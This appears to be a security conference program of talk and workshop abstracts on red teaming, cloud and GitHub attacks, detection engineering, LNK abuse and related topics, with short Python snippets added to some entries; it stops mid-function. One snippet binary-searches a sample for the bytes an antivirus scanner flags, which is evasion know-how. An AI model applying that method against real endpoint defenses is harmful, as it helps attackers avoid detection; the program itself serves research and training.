The purpose of the Red Team Training is to understand the underlying concepts of red teaming. The training covers payload generation, initial foothold, internal reconnaissance, and lateral movement techniques, and aims to provide a deep understanding of each of these aspects of a red team engagement.
Charles F. Hamilton (Mr.Un1k0d3r), CYPFER
Charles Hamilton is a Red Teamer with over ten years of experience delivering offensive testing services for various government clients and commercial sectors. In recent years, Charles has specialized in covert Red Team operations targeting complex and highly secured environments. These operations have enabled him to refine his skills in stealthily navigating client networks without detection.
Since 2014, he has been the founder and operator of the RingZer0 Team website, a platform dedicated to teaching hacking fundamentals. The RingZer0 community currently boasts over 50,000 members worldwide. Charles is also a prolific toolsmith and trainer who has delivered this training more than 20 times, both online and onsite. He is a speaker in the InfoSec industry, known under the handle Mr.Un1k0d3r.
Dive deep into cutting-edge techniques that bypass or neuter modern endpoint defenses. Learn how these solutions work so you can mitigate their utility and hide deep within code on the endpoint. The days of downloading a binary from the internet and pointing it at a remote machine are over; today's defenses often call for multiple bypasses within a single piece of code.
As cloud innovation gives birth to new technologies and new threats, now is the time to modernize your cloud security skills and bring them up to the industry standard. Join this hands-on, 4-day course to push your cloud hacking and vulnerability remediation skills to the next level and widen your career prospects. Get your hands dirty with our popular virtual labs and learn from experienced, practicing penetration testers with a legacy of training at Black Hat.
Do you feel pretty good about your Web Application Security testing methodology, but think you might be able to get more out of your tools? Years of experience providing instruction on conducting Web Application Security assessments have made one thing clear: even the most experienced testers lack a complete understanding of everything that is available in the industry's #1 Web Application Security testing tool, PortSwigger's Burp Suite Pro. It's time to fix that with Practical Burp Advanced Tactics (PBAT).
Workshops are first-come, first-serve and have limited capacity. Some workshops may be streamed for additional passive participation.
Type: Intermediate–Advanced
Focus: Adversary emulation, detection engineering, IR workflows
Style: Fast, offensive-defensive, "learn by attacking and defending"
Cloud platforms like Amazon Web Services (AWS) are foundational to many critical infrastructures and enterprise applications, making them prime targets for attackers. In this session, we will not only explore the most relevant attack vectors cybercriminals use to compromise AWS infrastructures but will also simulate these attacks using known threat actor techniques in an adversary emulation context. From initial access to hardcore persistence, this talk will provide a comprehensive look at how attackers operate in AWS environments.
We will take a technical journey through the tactics, techniques, and procedures (TTPs) employed by attackers at every stage of the threat lifecycle, aligned with the MITRE ATT&CK framework. We’ll start by reviewing common methods of initial access, such as exploiting exposed credentials or vulnerabilities in services like IAM, Lambda, and EC2. From there, we’ll detail how attackers escalate privileges, move laterally, and evade detection from tools like CloudTrail.
The session will conclude with an in-depth look at advanced persistence techniques in AWS, including the manipulation of IAM policies, backdooring Lambda functions or Docker containers, and tampering with logs. Along the way, we’ll demonstrate how security teams can implement defensive and detection strategies to mitigate these risks. By leveraging AWS-native services and third-party tools, attendees will learn how to enhance their incident response capabilities.
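One of the detection use cases mentioned above can be sketched as pure policy-document analysis: flagging IAM policies that grant unrestricted admin, a common end state of IAM-based persistence. This is an illustrative sketch, not the training's lab code; the function name and sample policy are invented.

```python
import json

def is_overly_permissive(policy_document: str) -> bool:
    """Flag IAM policy documents that allow every action on every
    resource -- a common goal of IAM-policy-manipulation persistence."""
    policy = json.loads(policy_document)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # single-statement shorthand
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        resources = stmt.get("Resource", [])
        if isinstance(actions, str):
            actions = [actions]
        if isinstance(resources, str):
            resources = [resources]
        if "*" in actions and "*" in resources:
            return True
    return False

backdoor = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})
print(is_overly_permissive(backdoor))  # True
```

In practice a detection pipeline would feed this kind of check with CloudTrail `PutUserPolicy`/`AttachRolePolicy` events rather than static documents.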
This hands-on workshop gives attendees practical, technical insights into AWS security and adversary behavior, and shows how to better defend against sophisticated, persistent attacks through deep technical immersion.
Requirements: Participants should have the following ready before the training:
- AWS CLI installed
- Terraform installed
- GitHub account for cloning lab repos
- Knowledge of AWS security fundamentals
An email with detailed setup instructions will be sent beforehand.
Provided material: GitHub repository with the solutions to the workshops.
Final Notes
This training is designed for security engineers, SOC analysts, incident responders, and anyone who wants to truly understand AWS security through hands-on work. By the end of the session, you'll have a deep understanding of how real attack and defense techniques work in AWS, and you will be able to assess hardening requirements, replicate attacks, generate detection use cases, and execute forensic techniques.
Santiago Abastante CTO, Solidarity Labs
Former Police Officer from Argentina, now a Cloud Incident Responder and Security Engineer with over 10 years of IT experience. A digital nomad and international speaker, I've presented on Cloud Security and Incident Response at Ekoparty, FIRST, Virus Bulletin (three times), Hack.Lu, and various BSides events worldwide. I hold a Bachelor's degree in Information Security and an MBA (Master of Business Administration).
AI agents represent a fundamental shift for security practitioners. They can automate tedious workflows, act as a co-pilot while you build custom tooling that was previously out of reach, and - when integrated into a well-designed system - serve as an intelligent analyst alongside you.
This workshop shows you all three. You'll learn to direct AI agents effectively, then apply those skills to customize and use a complete threat hunting system that combines deterministic processing with AI-assisted analysis.
What You'll Build
A working threat hunting pipeline:
The deterministic layer does the heavy lifting. The agent provides contextual analysis on what surfaces. You make the final call.
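The division of labor described above can be sketched in a few lines. This is a hedged illustration of the architecture, not the workshop's actual system: the rule, the event fields, and the stubbed agent call are all invented for the example.

```python
def deterministic_layer(events):
    """Heavy lifting: drop known-benign events with cheap, deterministic rules."""
    benign_processes = {"svchost.exe", "explorer.exe"}
    return [e for e in events if e["process"] not in benign_processes]

def agent_annotation(event):
    """Stand-in for the AI agent: attach contextual analysis to what surfaces.
    (In the real system this would be an LLM call, not a format string.)"""
    return {**event, "agent_note": f"review {event['process']} contacting {event['dest']}"}

events = [
    {"process": "svchost.exe", "dest": "10.0.0.5"},   # filtered deterministically
    {"process": "nc.exe", "dest": "203.0.113.9"},     # surfaced for analysis
]
surfaced = [agent_annotation(e) for e in deterministic_layer(events)]
print(len(surfaced))  # 1
```

The human analyst then makes the final call on whatever carries an `agent_note`.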
What You'll Learn
Beyond the system itself, you'll learn the practices that make agent collaboration effective:
- Structuring projects so agents understand your environment, optimize outputs, and retain "memory"
- Integrating systems that ensure you not only become effective at delivering results, but also continue learning while working with agents ("anti-brainrot systems")
- Context management and intuition: how to optimize your interaction with agents
- Extending agent capabilities: when MCPs are the right call, and when they are not
- Agentic coding best practices: staying on top of what's being built, not outsourcing your thinking
- Building reusable skills for repeatable security workflows
- Hooks and guardrails for safe, automated agent operation
Who Should Attend
Threat hunters, detection engineers, SOC analysts, and security practitioners who want to integrate AI agents into their workflow, whether for building tools, automating analysis, or hunting threats.
Requirements
- Laptop with terminal access
- Model access: I will be using Claude Code, but the course is agnostic; you can use any model to provide inference.
Faan Rossouw Researcher/Instructor, Active Countermeasures + AntiSyphon Training
Faan Rossouw is a security researcher at Active Countermeasures and instructs at Antisyphon Training, where he teaches courses on threat hunting and offensive security tooling. He's currently building AionSec.ai - courses designed to help security practitioners leverage AI agents in their work. Originally from South Africa, Faan is now based in Val-David, Quebec.
Talks will be streamed on YouTube and Twitch for free.
Red teaming and penetration testing are core practices of the cybersecurity audit landscape. Both rely on the ability to execute offensive software tools that are normally detected as malicious by antivirus software. To execute these tools on systems where antivirus software is installed, operators rely on several techniques to evade detection. In practice, detection evasion is too often ill-informed guesswork. A better methodology for evasion would allow for more efficient, and therefore more affordable, campaigns, thus contributing to more cyber-resilient organisations.
This presentation will discuss some of my ongoing Ph.D. research into methodologies for deducing information about detection capabilities present in antivirus software solutions. I propose a black-box approach based on software probes, mutations and the logical implications of their detection to identify antivirus capabilities. Correct identification of these capabilities would allow evasion techniques to be applied intently and minimally, reducing chances of unexpected detections and decreasing time spent on evading antivirus software.
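One concrete probe-and-mutate strategy consistent with this approach (my illustration, not necessarily the author's exact method) is binary-searching a sample for the bytes a black-box scanner keys on: submit truncated probes and use the logical implication "detected prefix contains the signature" to narrow it down.

```python
def locate_signature(payload: bytes, is_detected) -> int:
    """Binary-search for the length of the shortest prefix of `payload`
    that still triggers detection, using only black-box verdicts."""
    lo, hi = 0, len(payload)
    while lo < hi:
        mid = (lo + hi) // 2
        if is_detected(payload[:mid]):
            hi = mid          # signature ends at or before mid
        else:
            lo = mid + 1      # signature extends past mid
    return lo

# Mock scanner standing in for an AV: "detects" anything containing b"EVIL".
sample = b"benign-header" + b"EVIL" + b"trailing-data"
prefix_len = locate_signature(sample, lambda p: b"EVIL" in p)
print(sample[:prefix_len])  # b'benign-headerEVIL'
```

Each probe costs one scan, so the search converges in O(log n) verdicts; real capability inference must additionally contend with emulation, heuristics, and cloud lookups rather than a single static signature.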
This talk covers a large Security Operations Center (SOC)'s journey through maturing its detection engineering practice by implementing detection as code (DaC) principles.
What we will cover:
1. Our starting point (where a lot of SOCs are): no DaC, manually modifying rules in a SIEM;
2. What DaC is and why it's a game-changer for detection engineers;
3. Why we chose Sigma as the backbone of our DaC practice;
4. Our gradual transition to DaC;
5. A real case study of how Sigma + DaC made changing SIEMs much easier.
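A core payoff of DaC is that rules live in a repository and pass automated checks before reaching the SIEM. As an illustrative sketch (not this team's actual pipeline), a CI gate might lint each Sigma rule for its required fields; the rule is shown here as a Python dict rather than YAML to keep the example dependency-free, and its content is invented.

```python
REQUIRED_TOP_LEVEL = ("title", "logsource", "detection")

def lint_sigma_rule(rule: dict) -> list:
    """Return a list of problems -- the kind of check a DaC pipeline
    runs in CI before a rule is converted and deployed to the SIEM."""
    problems = [f"missing field: {f}" for f in REQUIRED_TOP_LEVEL if f not in rule]
    if "condition" not in rule.get("detection", {}):
        problems.append("detection has no condition")
    return problems

rule = {
    "title": "Suspicious PowerShell Download",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {"CommandLine|contains": "DownloadString"},
        "condition": "selection",
    },
}
print(lint_sigma_rule(rule))  # []
```

Because Sigma is backend-agnostic, the same gated rules can be converted for a new SIEM, which is exactly what makes migrations easier.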
Intended audience: people who create or manage detection rules in a SOC, people who want to increase the quality and stability of the rules they maintain, and people who are interested in how DevOps principles can be applied to security operations.
Émilio works at a large Canadian organization doing software development, detection engineering and incident response. He's a co-organizer of MontréHack (a monthly cybersecurity workshop) and NorthSec's VP CTF.
Outside the cybersecurity world, he's passionate about urbanism and the economics of housing. He will gladly explain, to anyone who dares ask, how exclusionary zoning and parking mandates are the reasons you can't buy a home.
Security Operations Centers (SOCs) are used by companies to defend themselves against cyber-attacks. These SOCs monitor logs collected from the enterprise network, such as process activity, authentication events, and netflow, to identify attacks or compromises. Security teams must navigate numerous alerts generated by a wide range of security controls, using both rules and Machine Learning (ML) to identify malicious activity. This is even more the case in large-scale SOCs, or for companies offering Managed Detection and Response (MDR).
This talk showcases a multi-step approach used in a modern large-scale managed SOC that manages thousands of enterprise networks, demonstrating how it can successfully identify a real infostealer attack through multiple layers of filtering and processing. Over a two-week period containing 9.7 trillion event logs, the presented approach combines alert deduplication, individual rule-based and ML-based detectors, alert suppression, and a supervised ML-based alert prioritization model to dramatically reduce the noise, so that security analysts can pinpoint the infostealer activity.
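The stages of such a funnel compose naturally. The following is a hedged, miniature sketch (all rule names and event fields invented; the `score` callable stands in for the supervised ML prioritization model):

```python
def triage(alerts, suppressed_rules, score):
    """Sketch of the multi-step funnel: deduplicate, suppress
    known-noisy rules, then rank what remains for the analyst."""
    seen, unique = set(), []
    for a in alerts:
        key = (a["rule"], a["host"])      # dedup on (rule, host)
        if key not in seen:
            seen.add(key)
            unique.append(a)
    kept = [a for a in unique if a["rule"] not in suppressed_rules]
    return sorted(kept, key=score, reverse=True)

alerts = [
    {"rule": "noisy-dns", "host": "wks1", "severity": 1},
    {"rule": "noisy-dns", "host": "wks1", "severity": 1},  # duplicate
    {"rule": "infostealer-c2", "host": "wks2", "severity": 9},
    {"rule": "macro-exec", "host": "wks3", "severity": 5},
]
ranked = triage(alerts, suppressed_rules={"noisy-dns"},
                score=lambda a: a["severity"])
print([a["rule"] for a in ranked])  # ['infostealer-c2', 'macro-exec']
```

At trillion-event scale each stage runs on distributed infrastructure, but the ordering principle is the same: cheap reductions first, the learned model last.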
François Labrèche Principal Data Scientist, Sophos
François Labrèche is a Principal Data Scientist at Sophos, who focuses on applying machine learning approaches to research problems related to security alerts and vulnerabilities. He focuses on using machine learning to improve the prioritization of alerts and vulnerabilities, in the context of XDR and vulnerability management. He has a Ph.D. from École Polytechnique de Montréal, and has published research papers on the topics of threat research, spam detection, malware analysis and machine learning applied to cybersecurity. He has presented at ACSAC, CAMLIS, NorthSec, BSides Montreal, University College London and École Polytechnique de Montréal, and has published papers in conferences such as the ACM CCS and eCrime.
Windows shortcut (.LNK) files have remained a popular attack vector over several decades, yet their underlying format is still largely archaic and remains the "gift that keeps on giving" by presenting new opportunities for abuse, even in 2026.
If you believe minor bypasses like adding spaces to an LNK's target (CVE-2025-9491) are the limit of LNK exploitation, this session will change your mind.
We will show previously undocumented LNK techniques that actually allow for more deceptive payload delivery/command execution. We will look at why these new techniques 'work', compare them to existing LNK tricks, and discuss the implications for defenders.
The research methodology behind these new findings, which involved black-box testing of Microsoft's LNK implementation, will also be discussed, demonstrating how adopting the "hacker's mindset" helped uncover these LNK tricks.
In addition, this session will introduce an open-source tool designed to assist security professionals, red teams, and researchers in generating and experimenting with advanced LNK payloads. This tool aims to enhance the ability to simulate and defend against shortcut-based attacks, thereby improving Windows endpoint security.
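As a minimal illustration of the kind of format-level experimentation the session describes (this is not the session's tool), the fixed 76-byte ShellLinkHeader that opens every .LNK file can be parsed in a few lines, per the MS-SHLLINK layout: HeaderSize, then the LinkCLSID, then the LinkFlags bitfield.

```python
import struct
import uuid

# Every valid .LNK starts with HeaderSize 0x4C and this fixed CLSID.
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

def parse_lnk_header(data: bytes) -> dict:
    """Parse the fixed ShellLinkHeader of a Windows shortcut."""
    size, = struct.unpack_from("<I", data, 0)
    clsid = uuid.UUID(bytes_le=data[4:20])
    flags, = struct.unpack_from("<I", data, 20)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a .LNK file")
    return {
        "has_target_id_list": bool(flags & 0x01),  # HasLinkTargetIDList
        "has_arguments": bool(flags & 0x20),       # HasArguments -- where payloads often hide
    }

# Minimal synthetic header: size + CLSID + flags(HasArguments), zero-padded to 76 bytes.
hdr = struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le + struct.pack("<I", 0x20) + b"\x00" * 52
print(parse_lnk_header(hdr))  # {'has_target_id_list': False, 'has_arguments': True}
```

Mutating individual flags and fields in crafted headers like this, then observing how Explorer renders and executes the result, is the essence of black-box testing the format.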
Wietze has been hacking around with computers for years. Originally from the Netherlands, he currently works as a Lead Threat Detection & Response Engineer in London. As a cyber security enthusiast and threat researcher, he has presented his findings on topics including attacker emulation, PowerShell obfuscation, DLL Hijacking, and command-line shenanigans at a variety of security conferences. By sharing his research, publishing related tools, and through his involvement in open-source projects such as LOLBAS, HijackLibs and ArgFuscator, he aims to give back to the community he learnt so much from.
Internet shutdowns are often described as a single action — “turning the Internet off.” In practice, they are the result of carefully orchestrated, multi-layered technical controls applied across national infrastructure. Building on my previous talk at BSides, which introduced the fundamental mechanisms of Internet censorship and shutdowns, this session presents a deeper and more comprehensive technical analysis of the 2026 Internet blackout in Iran.
This talk treats large-scale censorship not as a political phenomenon, but as a network engineering and security operation. We examine who has the technical authority to execute shutdowns, how different censorship techniques are layered and coordinated, and when specific tactics are selectively deployed to maximize impact while maintaining internal network functionality.
The analysis spans multiple layers of the stack. At the routing level, we examine BGP route withdrawals, path manipulation, and international transit isolation. At the access and transport layers, we analyze ISP-level service suppression, mobile network data blackouts, and traffic throttling. At the protocol and application layers, we explore deep packet inspection (DPI), protocol fingerprinting, encrypted traffic degradation, and selective blocking of VPNs, QUIC, and TLS-based services.
Special attention is given to the role of national intranet architectures, which allow domestic services to remain reachable while international connectivity collapses, creating the illusion of partial availability. The session also addresses the technical limits of alternative access methods, including satellite Internet, and why such technologies are not a universal solution under state-scale controls.
Using timelines, traffic behavior, and protocol-level indicators, the talk demonstrates that modern Internet shutdowns are graduated, adaptive, and measurable rather than binary events. Attendees will learn how these techniques manifest on the wire, how they can be detected from inside and outside the affected region, and why many common circumvention strategies fail under coordinated, nation-state enforcement.
This presentation is intended for security professionals, network engineers, and researchers interested in Internet resilience, censorship measurement, and large-scale network interference, offering a technically grounded continuation of prior research and real-world observations.
Reza Sharifi Executive Consultant - Cybersecurity Specialist, CGI Deutschland
I’m a cybersecurity professional with a background in network security and internet infrastructure research. My focus is on the intersection of technology and civil liberties, particularly how network-layer protocols are used—and misused—by state actors to control access to information.
GitHub gives attackers something they love: a place where identity, automation, and production changes meet. Once they’re in, the path from “read access” to “shipping malicious code” can be disturbingly short.
In this talk, we walk through realistic attack paths into GitHub organizations, starting with initial access techniques like device-code phishing and the abuse of trusted GitHub Apps (including the GitHub CLI). From there, we explore how different credential types enable access: long-lived Personal Access Tokens that often persist on developer machines, and short-lived automation credentials like GITHUB_TOKEN that can still leak through logs, artifacts, or misconfigured workflows, and then be leveraged to move laterally or expand privileges.
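When a token-like string turns up in logs or artifacts, its documented GitHub prefix already tells a responder (or an attacker) a lot about what it can do and how long it lives. The triage helper below is my own hypothetical sketch; the prefixes themselves are the ones GitHub publishes for its token formats.

```python
# Documented GitHub token prefixes and what they imply for triage.
TOKEN_PREFIXES = {
    "ghp_": "classic personal access token (long-lived)",
    "github_pat_": "fine-grained personal access token",
    "ghs_": "app installation token / GITHUB_TOKEN (short-lived)",
    "gho_": "OAuth access token",
}

def classify_github_credential(token: str) -> str:
    """Classify a leaked-looking string by its GitHub token prefix."""
    for prefix, kind in TOKEN_PREFIXES.items():
        if token.startswith(prefix):
            return kind
    return "unknown"

print(classify_github_credential("ghs_" + "x" * 36))
# app installation token / GITHUB_TOKEN (short-lived)
```

A `ghs_` token found in a workflow artifact may already be expired; a `ghp_` token found on a developer machine usually is not, which is exactly the asymmetry the talk explores.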
We highlight tactics we’ve developed and researched post-initial access: how you can abuse sensitive workflows, exploit approval and review dynamics, and find paths around policy guardrails like “protected” pipelines and code-signing rulesets. We’ll also discuss tradeoffs attackers make to reduce forensic visibility and delay detection in environments where GitHub’s native telemetry is limited.
We close with practical defender takeaways: detection strategies and response playbooks focused on the signals that matter, and how to improve monitoring coverage in the places where GitHub is hardest to observe.
Attendees will leave with a shared framework that's useful on both sides of the table. Defenders will get a checklist for reducing risk across identities, tokens, integrations, and Actions workflows, plus concrete ideas for building higher-signal detection and response in places where visibility is lacking. Red teams will gain a realistic map of where GitHub controls tend to break down in practice, along with a set of hypotheses to test during assessments that go beyond "find a secret in a repo." The goal is to walk out with sharper intuition for how small weaknesses chain into meaningful impact, and practical ways to either validate that risk (red teams) or eliminate it (blue teams) without grinding delivery to a halt.
Andrew Buchanan Senior Red Team Operator, Figment
Andrew is a Senior Red Team Operator at Figment, the world’s leading independent staking infrastructure provider. With over six years of Red Team experience, Andrew brings deep expertise across offensive security, adversary simulation, and real-world attack execution.
Prior to joining Figment, Andrew held cybersecurity roles at one of Canada’s largest financial institutions, conducting advanced red team engagements and security assessments across highly complex enterprise environments.
At Figment, Andrew plans and executes red team operations, penetration tests, and targeted security assessments with a focus on initial access, execution, cloud attack surfaces, and social engineering. As an initial access and social engineering specialist, he has designed and delivered numerous successful campaigns that closely mirror real-world threat actors. Andrew's work helps ensure Figment continuously tests and strengthens its defences, so that Figment's institutional customers can trust they're using the most secure staking product on the market.
Max CM Security Architect and Red Team Lead, Figment
Max Courchesne-Mackie is a cyber security professional with over a decade of experience spanning defense, red teaming, and blockchain security. Max currently serves as a Security Architect at Figment, the leading independent staking infrastructure provider globally. He began his career in the defense industry focused on offensive security, a discipline that remains his core passion and informs his pragmatic approach to risk. Today, Max designs and reviews secure systems for the blockchain industry, an environment facing relentless, rapidly evolving threats. He partners with engineering and product teams to harden architectures, pressure-test assumptions, and translate attacker tradecraft into practical controls. Max's recent work centers on threat modeling for decentralized systems, secure key and wallet management, and building detection/response mechanisms that assume breach.
Connor Laidlaw Senior Application Security Engineer, Figment
Connor is a Senior Application Security Engineer at Figment, the world's leading independent staking infrastructure provider. His career spans a diverse range of security domains, including low-level vulnerability research, offensive security for ticket scalping operations, and engineering defenses to protect applications from abuse.
At Figment, Connor serves as the security subject matter expert for all customer-facing applications. He proactively identifies security concerns at every stage of the software development lifecycle and partners with engineering teams to architect robust solutions. Connor is also spearheading an initiative to integrate AI into Figment's security program, including the development of highly specialized offensive security agents powered by deep contextual awareness of Figment's environment—ensuring that Figment's institutional customers can trust they're using the most secure staking product on the market.
Security researchers push the boundaries of what’s possible. (Nation-state) threat actors push the boundaries of what’s exploitable. In many cases, threat actors adopt public research for their operations, but there are also many examples where threat actors use novel techniques to compromise cloud environments before researchers publish their findings.
In this talk, a cloud security researcher and a threat intelligence analyst team up to explore how cutting-edge cloud attack research is rapidly weaponized by espionage threat groups. We'll walk through real-world examples where newly published techniques – intended to educate defenders – were adopted and operationalized by nation-state actors targeting cloud environments. The focus of the talk will be on Entra ID and Microsoft 365 attacks, exploring the technical mechanics behind the tools and techniques, why threat actors are interested in utilizing them, and real-world examples of research adoption. Techniques covered include device code phishing, authorization code phishing (ConsentFix), and the adoption of open-source security tools.
This session highlights how attack paths that may seem highly theoretical at first glance can pose a significant and immediate threat to organizations operating in the cloud. What starts as a proof-of-concept in a blog can quickly become a part of a threat actor’s playbook.
Dirk-jan Mollema Security Researcher, Outsider Security
Dirk-jan Mollema is a security researcher focusing on Active Directory and Microsoft Entra (Azure AD) security. In 2022 he started his own company, Outsider Security, where he performs penetration tests and reviews of enterprise networks and cloud environments. He blogs at dirkjanm.io, where he publishes his research, and shares updates on the many open source security tools he has written over the years. He presented previously at TROOPERS, DEF CON, Black Hat and BlueHat, is a current Microsoft MVP and has been awarded as one of Microsoft’s Most Valuable Researchers multiple times.
In March of 2025, the Model Evaluation & Threat Research (METR) group introduced AI task time horizons as a method for measuring the length of tasks that models can autonomously complete coherently. They demonstrated rapid growth in capabilities across frontier systems: effectively showing a doubling every ~7 months. While this framework has primarily been applied to general software and knowledge work, its implications for adversarial domains remain largely unexplored.
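The headline trend (a doubling every ~7 months) is easy to extrapolate. In the sketch below, the starting horizon of 60 minutes is an arbitrary illustrative value, not METR's measured figure; only the doubling period comes from the cited result.

```python
def horizon(months_from_now, h0_minutes=60.0, doubling_months=7.0):
    """Extrapolate a task time horizon that doubles every
    `doubling_months` months from an illustrative starting value."""
    return h0_minutes * 2 ** (months_from_now / doubling_months)

# After one doubling period the horizon is exactly twice the start:
print(horizon(7))   # 120.0
# Two years out, the same trend implies roughly a tenfold increase:
print(round(horizon(24), 1))
```

The exponential form is what makes horizon-based evaluation interesting for offensive work: modest near-term capabilities compound quickly if the trend holds.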
In this talk, I present work I've done with Sean Peters and Jack Payne, extending METR’s methodology to offensive cybersecurity workflows, alongside a complementary human baseline study to ground and interpret model performance.
Motivated by the desire to better understand offensive model capabilities, we assembled realistic multi-step offensive task sequences by leveraging a suite of industry standard benchmarks. Both human participants and frontier models were evaluated across increasing task lengths to quantify sustained autonomy, coherence, and failure modes.
Initial results indicate that AI task horizons in offensive cyber are already meaningful and extending rapidly. In several domains, models can chain complex tool-driven actions resembling early-stage intrusion playbooks rather than isolated exploitation steps. The human study provides critical context, highlighting where models approach or diverge from human performance as task length increases.
The talk will cover the experimental design, empirical findings, and key limitations, emphasizing how horizon-based evaluation combined with human grounding surfaces trends that may not be observable by standalone, static benchmarks.
Finally, this work is positioned as exploratory research. It raises questions about whether similar horizon trends appear in defensive workflows: how could we measure defensive task horizons, and what methods would allow meaningful comparisons to offensive performance? If the trend does not replicate in defense, what interventions, tooling, or policy changes could help close the gap? This framing invites further investigation and provides a roadmap for research and practitioner engagement in understanding and mitigating offense–defense asymmetries under AI automation.
Jeremy Miller Sr. Manager, Cybersecurity Strategy & Research, OffSec
Jeremy Miller is an offensive security leader and educator, currently focused on how AI automation is reshaping adversarial capability. He spent over a decade at Offensive Security in technical and leadership roles across content development, training, and workforce development programs, bridging hands-on offensive methodology with pedagogy and strategy.
His current research, in collaboration with Sean Peters and Jack Payne, applies the METR AI task time horizon framework to realistic offensive cyber workflows, grounded by complementary human studies to measure autonomy scaling in adversarial domains.
Jeremy’s interests center on offense–defense asymmetry, empirical evaluation of autonomous systems, and translating AI security and safety research into practical implications for decision makers.
Abstract: Traditional defensive measures alone are proving insufficient against determined adversaries. This talk introduces a systematic approach to implementing effective deception solutions by using BloodHound's OpenGraph framework to map and deploy deceptive attack paths across AD and third-party enterprise technologies.
This talk moves beyond basic honeypots and canary tokens, demonstrating how to build discoverable deceptions that actually entice attackers. We'll explore how understanding existing attack paths in your environment is crucial to creating believable deceptions that adversaries will naturally encounter and attempt to exploit.
Key Topics Covered:
- Attack Path-Driven Deception Design: Using attack path analysis to identify optimal deception placement points and create realistic adversary scenarios
- OpenGraph for Deception Mapping: Extending beyond Active Directory to model deceptive attack paths across Git repositories, configuration management systems, and cloud services
- Practical Implementation Examples: Live demonstrations including AD CS deception using Certiception, repo-based deceptions with GitHound, and infrastructure deceptions through AnsibleHound and SCCMHound
Joshua Prager Managing Consultant, SpecterOps Inc.
Josh Prager has over 13 years of experience focusing on DoD red team infrastructure, cyber threat emulation, and threat hunting. As a former threat hunter in the federal industry, he provided various cyber threat emulation and threat hunting assessments throughout DoD environments. As a principal consultant at SpecterOps, he guides clients in developing the maturity of their detection and response programs, building their detection engineering capabilities, and ensuring detective and preventive coverage of offensive techniques.
We can't trust the images and videos we see online anymore. Recent generative AI improvements support the creation and modification of convincing digital media in quasi real time. We live in an era where these fakes are routinely shared online to influence public opinion, even by elected officials themselves!
Fortunately, technologies exist to embed cryptographic signatures and watermarks in these digital assets, proving their origin. The C2PA specification is being adopted by many technology providers, camera manufacturers, and news media organizations. Major deployments have started in 2025 and will accelerate in 2026.
In high-risk contexts (conflict zones, protests, corruption reporting) creators might be reluctant to share certified images and videos for fear of retribution. Is there a way to reconcile the need for authenticated assets and the privacy of their creators? The answer is yes!
In this talk, we'll explore cryptographic options to provide privacy to those who capture and share digital assets, enabling anonymous yet verifiable content. We'll present an open-source prototype that augments the C2PA specification by using blind signatures and zero-knowledge proofs to hide the signer's identity. These technologies offer the best of both worlds: enabling the public, reporters, and whistleblowers to share sensitive authentic digital media with strong privacy protections, which would increase trust in our content ecosystems.
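The prototype combines blind signatures with zero-knowledge proofs; the blind-signature half can be illustrated with textbook Chaum-style RSA. The toy parameters below are wildly insecure and purely pedagogical, but they show the key property: the signer never sees the message it certifies, yet the unblinded signature still verifies.

```python
# Toy RSA blind signature (textbook numbers, NOT secure -- illustration only).
p, q = 61, 53
n = p * q                      # 3233
e, d = 17, 2753                # e*d == 1 (mod lcm(p-1, q-1))

def blind_sign(message: int, r: int) -> int:
    """The creator blinds with random r, the signer signs the blinded
    value, and the creator unblinds -- yielding a valid signature on a
    message the signer never saw."""
    blinded = (message * pow(r, e, n)) % n   # creator: m * r^e mod n
    blind_sig = pow(blinded, d, n)           # signer: signs blindly
    return (blind_sig * pow(r, -1, n)) % n   # creator: strip r, get m^d mod n

m, r = 1234, 7                               # r must be coprime to n
sig = blind_sign(m, r)
print(pow(sig, e, n) == m)  # True
```

In the C2PA setting this is what lets a manifest be certified by a trusted signer without that signer linking the signature back to the creator at signing time; the zero-knowledge layer then handles selective disclosure.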
Christian Paquin Principal Research Software Engineer, Microsoft Research
Christian is a security specialist in the Microsoft Research Cryptography team with a mission to bridge the gap between academic research and real-world systems. With 25 years of experience, Christian has been involved in many industry-wide initiatives such as the development of privacy enhancing identity technologies (such as anonymous credentials), the ongoing post-quantum cryptographic migration, and the Coalition for Content Provenance and Authenticity (C2PA) to fight online disinformation. Christian shares some of his work results on his blog.
Talks will be streamed on YouTube and Twitch for free.
When you think of hacking browsers, you perhaps think of V8 heap exploitation, deep-dive fuzzing, crazy sandbox escapes, and so on. But what if I told you that you can still find vulnerabilities in major browsers that don’t require any technical knowledge? Bugs you can even run into by accident!
In this talk, I’ll take you through my journey of how I “accidentally” found a vulnerability in Google Chrome, and how that led me to find two more vulnerabilities in Chrome, two in Mozilla Firefox, and many more bugs in other products.
So if you’re keen to find out how I could, with minimal user-interaction, steal your private GitHub repositories, then this talk is for you!
Robbe Van Roey Offensive Security Lead, Toreon
Hi! I’m Robbe Van Roey 👋
I’m a hacker. I like breaking stuff. I’m a penetration tester at Toreon, I’ve worked for a bug bounty company, and I’ve found 35+ CVEs. I love hacking web apps, mobile applications, AI systems, and Active Directory. I’m also a teacher. I teach developers about secure coding, I teach beginners about Red Teaming for Hack The Box and I’ve created a bunch of YouTube videos on my channel.
In the online realm, you may know me as PinkDraconian. Come up to me and say hi!
My life motto is “Hacking you so you don’t get hacked” and I’d like to show you part of that ideology during my talk. See you there!
Have you ever wondered how to run code inside a different process? Or, for that matter, why you would WANT to run code in another process?
I originally entered the security world writing cheats for late-90s Windows games such as Starcraft and Warcraft II. The tools are functionally lost to the ages, but the techniques I used have served me for years: process injection isn't just for cheating at video games. Adding, changing, bypassing, or even calling code in a foreign process can help with fuzzing, reverse engineering, malware detection, and much more!
But for a technique so commonly used, there isn't really a "standard" way to do it, especially on Linux!
One day, I read a blog discussing how hard it was to do on Linux. I thought, "that can't be right, it's easy on Windows!" and set out to prove them wrong. Days later, I had accidentally written a debugger and learned way, way too much about the ptrace API and /proc filesystem!
In this talk, I'll demonstrate the tooling I built and why it might be more useful than you might think to do this yourself!
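For a taste of the Linux side: the first step of most injection tooling is mapping out the target's address space via the `/proc/<pid>/maps` file mentioned above. Here is a minimal parser for that recon step (a sketch only, not the speaker's actual tool):

```python
# Parse /proc/<pid>/maps lines into address range, permissions, and
# backing path. Injection tooling uses this to find executable (r-xp)
# regions before writing code via ptrace or /proc/<pid>/mem.

def parse_maps_line(line):
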